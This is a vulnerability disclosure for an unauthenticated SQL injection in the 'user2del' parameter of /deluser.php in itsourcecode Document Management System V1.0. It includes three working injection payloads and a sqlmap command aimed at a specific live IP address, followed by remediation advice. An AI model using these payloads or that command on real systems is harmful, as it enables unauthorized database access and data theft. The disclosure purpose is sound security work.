itsourcecode Document Management System V1.0 SQL Injection Vulnerability

NAME OF AFFECTED PRODUCT(S)

• Document Management System

Vendor Homepage
https://itsourcecode.com/free-projects/php-project/document-management-system-open-source-php/

AFFECTED AND/OR FIXED VERSION(S)

• V1.0

Vuldb Submitter

• WeiPei (Hainan University)

Vulnerable File

-/deluser.php

VERSION(S)

• V1.0

PROBLEM TYPE

Vulnerability Type

• SQL Injection

Root Cause

• A SQL injection vulnerability was found in the "/deluser.php" file of the "Document Management System Project In PHP". The reason for this issue is that attackers can inject malicious code from the parameter 'user2del' after no logging in with valid credentials. The application fails to properly sanitize or validate this input before using it in SQL queries. This allows attackers to manipulate SQL queries and perform unauthorized operations.

Impact

• Attackers can exploit this SQL injection vulnerability to no unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

During the security review of "Document Management System", a critical SQL injection vulnerability was discovered in the "/deluser.php" file. attackers can inject malicious SQL queries through this parameter. Immediate remedial measures are needed to ensure system security and protect data integrity.

Vulnerability Location:

• 'user2del' parameter (POST)

POC:

Parameter: user2del (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user2del=111' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 111 ELSE 0x28 END))-- iyEu

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: user2del=111' AND GTID_SUBSET(CONCAT(0x7170707171,(SELECT (ELT(2680=2680,1))),0x716a767a71),2680)-- jfOr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user2del=111' AND (SELECT 2957 FROM (SELECT(SLEEP(5)))rWXw)-- MsNk

NO AUTHENTICATION REQUIRED

• Exploitation requires no authentication or prior access to the system.

The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:

python sqlmap.py --random-agent --batch -u "http://38.175.200.188:1023/deluser.php" --data "user2del=111" --dbms=mysql --current-db

Suggested Repair

1. Use Prepared Statements and Parameter Binding:
   Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepared statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

2. Input Validation and Filtering:
   Strictly validate and filter user input data to ensure it conforms to the expected format. For example, ensure that nominee IDs match a valid numeric pattern.

3. Minimize Database User Permissions:
   Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.

4. Regular Security Audits:
   Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.